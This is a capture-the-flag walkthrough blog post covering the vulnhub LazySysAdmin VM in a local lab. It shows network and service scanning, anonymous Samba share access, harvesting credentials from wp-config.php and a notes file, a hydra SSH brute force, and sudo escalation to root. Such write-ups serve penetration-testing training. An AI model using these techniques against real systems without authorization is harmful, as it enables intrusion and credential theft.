Today we’re going to start out training session with a fairly decent image from vulnhub.com – LazySysAdmin: 1 .
To use this image, just download, unzip and throw it against a running virtualbox .
Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP Adress via DHCP on this network. We’re using vboxnet4 (192.168.60.0/24) here, so just adapt this to your networking.
We are also working on a macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:
- netdiscover
- nmap
- dirb
- THC hydra
If you want to install these tools with Homebrew, just tap brew tap feffi/homebrew-pentest.
$ brew tap feffi/homebrew-pentest
Everything up? OK, let’s start.
Meanwhile somewhere in outer space…
$ sudo netdiscover -i vboxnet4 -f -r 192.168.60.0/24
Currently scanning: Finished! | Our Mac is: DE:AD:BE:EF:DE:AD - 0
1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 1
_________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------
192.168.60.2 08:00:27:6d:95:4e 1 60 Unknown vendor
Ah, right, 192.168.60.2, that’s fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:
$ export ip="192.168.60.2"
$ echo $ip
Nice, let’s start a common scanning for services:
$ nmap -sV -sC $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET
Nmap scan report for 192.168.60.2
Host is up (1.0s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.60.1
|_ error: Closing link: (nmap@192.168.60.1) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2017-11-05T00:22:19+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2017-11-04 15:22:19
|_ start_date: 1601-01-01 00:53:28
Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see, the account guest is authenticated as user, that is nice. Before we continue, we note down everything that might be a username or password:
$ echo "TR2" >> login.txt
$ echo "guest" >> login.txt
$ echo "LAZYSYSADMIN" >> login.txt
$ echo "lazysysadmin" >> login.txt
$ echo "x00" >> login.txt
Let’s chat…
Having a look a the irc deamon …
$ telnet 192.168.60.2 6667
Escape character is '^]'
:Admin.local NOTICE Auth :*** Looking up your hostname...
>>PASS none
:Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.1) instead.
>>NICK Bla
>>USER blah blah blah blah
:Admin.local NOTICE Auth :Welcome to Localnet!
:Admin.local 001 Bla :Welcome to the Localnet IRC Network Bla!blah@192.168.56.1
:Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0
:Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016
:Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov
:Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server
:Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:Admin.local 042 Bla 690AAAAAD :your unique I
:Admin.local 375 Bla :Admin.local message of the day
:Admin.local 372 Bla :- Please edit /etc/inspircd/mot
:Admin.local 376 Bla :End of message of the day.
:Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers
:Admin.local 254 Bla 0 :channels formed
:Admin.local 255 Bla :I have 1 clients and 0 servers
:Admin.local 265 Bla :Current Local Users: 1 Max: 1
:Admin.local 266 Bla :Current Global Users: 1 Max: 1
Checking for weaknesses on InspIRCd-2.0 … only DoS and spoofing, no remote access known. Let’s walk on to the next.
Samba, Samba, olê…
Now we can enumerate the Samba shares as guest:
$ nmap -sV --script=smb-enum-shares -p445 $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET
Nmap scan report for 192.168.60.2
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: LAZYSYSADMIN
Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.60.2\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Web server)
| Users: 1
| Max Users:
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.60.2\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users:
| Path: C:\var\lib\samba\printers
| Anonymous access:
| Current user access:
| \\192.168.60.2\share$:
| Type: STYPE_DISKTREE
| Comment: Sumshare
| Users: 0
| Max Users:
| Path: C:\var\www\html\
| Anonymous access: READ/WRITE
|_ Current user access: READ/WRITE
Oh, nice! A guest writeable directory. Maybe we can snoop around…
$ mkdir share
$ mount_smbfs //guest:@192.168.60.2/share$ share
$ cd share
$ tree -L 2 .
.
├── Backnode_files
│ ├── AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4.jpg
│ ├── failure-good-thing-fixed.png
│ ├── front-end.css
│ ├── front-end.js
│ ├── jquery-ui.js
│ ├── jquery.js
│ ├── logo.png
│ ├── normalize.css
│ ├── pageable.js
│ ├── picto1.png
│ ├── picto2.png
│ ├── picto3.png
│ ├── script.json
│ ├── styles.css
│ └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif
├── apache
├── deets.txt
├── index.html
├── info.php
├── old
├── robots.txt
├── test
├── todolist.txt
├── wordpress
│ ├── index.php
│ ├── license.txt
│ ├── readme.html
│ ├── wp-activate.php
│ ├── wp-admin
│ ├── wp-blog-header.php
│ ├── wp-comments-post.php
│ ├── wp-config-sample.php
│ ├── wp-config.php
│ ├── wp-content
│ ├── wp-cron.php
│ ├── wp-includes
│ ├── wp-links-opml.php
│ ├── wp-load.php
│ ├── wp-login.php
│ ├── wp-mail.php
│ ├── wp-settings.php
│ ├── wp-signup.php
│ ├── wp-trackback.php
│ └── xmlrpc.php
└── wp
Really? A wordpress installation! Let us check this first.
$ cat wordpress/wp-config.php | grep DB_USER
define('DB_USER', 'Admin');
$ cat wordpress/wp-config.php | grep DB_PASSWORD
define('DB_PASSWORD', 'TogieMYSQL12345^^');
$ cat wordpress/wp-config.php | grep DB_NAME
define('DB_NAME', 'wordpress');
Noted! We got our first username/password combination.
$ echo "deets" >> login.txt
$ echo "Admin" >> login.txt
$ echo "admin" >> login.txt
$ echo "TogieMYSQL12345^^" >> login.txt
$ echo "Togie" >> login.txt
$ echo "togie" >> login.txt
What else do we get here?
$ cat deets.txt
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
$ echo "CBF" >> login.txt
$ echo "12345" >> login.txt
Yeah…sure…we updated it.
$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser
Done. So we got some stuff here, but where to put it?
Land of the Apache
Maybe we should enumerate a little further. We got an website listening on port 80. Spider that:
$ dirb http://$ip
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 4 14:38:59 2017
URL_BASE: http://192.168.60.2/
WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.60.2/ ----
==> DIRECTORY: http://192.168.60.2/apache/
+ http://192.168.60.2/index.html (CODE:200|SIZE:36072)
+ http://192.168.60.2/info.php (CODE:200|SIZE:77236)
==> DIRECTORY: http://192.168.60.2/javascript/
==> DIRECTORY: http://192.168.60.2/old/
==> DIRECTORY: http://192.168.60.2/phpmyadmin/
+ http://192.168.60.2/robots.txt (CODE:200|SIZE:92)
+ http://192.168.60.2/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://192.168.60.2/test/
==> DIRECTORY: http://192.168.60.2/wordpress/
==> DIRECTORY: http://192.168.60.2/wp/
... (lots of output)
Ok, by the time dirb is running we got some interesting directories to look at:
http://192.168.60.2/apache/http://192.168.60.2/info.phphttp://192.168.60.2/phpmyadmin/http://192.168.60.2/wordpress/
And some more. We’ve already seen those in the samba-enumeration. Let’s try our wordpress then…
$ curl -v http://192.168.60.2/wordpress/
...
My name is togie.
My name is togie.
My name is togie.
My name is togie.
...
mhhh that togie again…mhhh, maybe…we can try ssh…
Serpentine water monster
Let us try our already filled login list
$ hydra -t 4 -L login.txt -P login.txt ssh://$ip
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-04 20:35:23
[DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task
[DATA] attacking ssh://192.168.60.2:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active
[22][ssh] host: 192.168.60.2 login: togie password: 12345
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-11-04 20:36:42
Nice! So we login using togie and password 12345
$ ssh togie@$ip
##################################################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
##################################################################################################
togie@192.168.60.2's password: 12345
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Sun Nov 5 02:24:33 AEST 2017
System load: 0.0 Processes: 177
Usage of /: 48.5% of 2.89GB Users logged in: 0
Memory usage: 31% IP address for eth0: 192.168.60.2
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
133 packages can be updated.
0 updates are security updates.
togie@LazySysAdmin:~$
So we got a shell. Let’s enumerate further.
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
We got sudo…
Flag
$ sudo su -
[sudo] password for togie: 12345
root@LazySysAdmin:~# ls -al
total 28
drwx------ 3 root root 4096 Aug 15 23:10 ./
drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../
-rw------- 1 root root 1050 Nov 3 14:45 .bash_history
-rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc
drwx------ 2 root root 4096 Aug 14 20:30 .cache/
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw-r--r-- 1 root root 347 Aug 21 19:35 proof.txt
Gotcha!
$ cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learned a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
Was this post helpful?
//
More articles
fromKevin Wennemuth & Martin Riedel
24.5.2018 //
Your job at codecentric?
Jobs
Agile Developer und Consultant (w/d/m)
Alle Standorte
//
More articles in this subject area
Discover exciting further topics and let the codecentric world inspire you.
//
Gemeinsam bessere Projekte umsetzen.
Wir helfen deinem Unternehmen.
Du stehst vor einer großen IT-Herausforderung? Wir sorgen für eine maßgeschneiderte Unterstützung. Informiere dich jetzt.
Hilf uns, noch besser zu werden.
Wir sind immer auf der Suche nach neuen Talenten. Auch für dich ist die passende Stelle dabei.
Blog authors
Kevin Wennemuth
Head of IT Security
Do you still have questions? Just send me a message.
Martin Riedel
Do you still have questions? Just send me a message.
Do you still have questions? Just send me a message.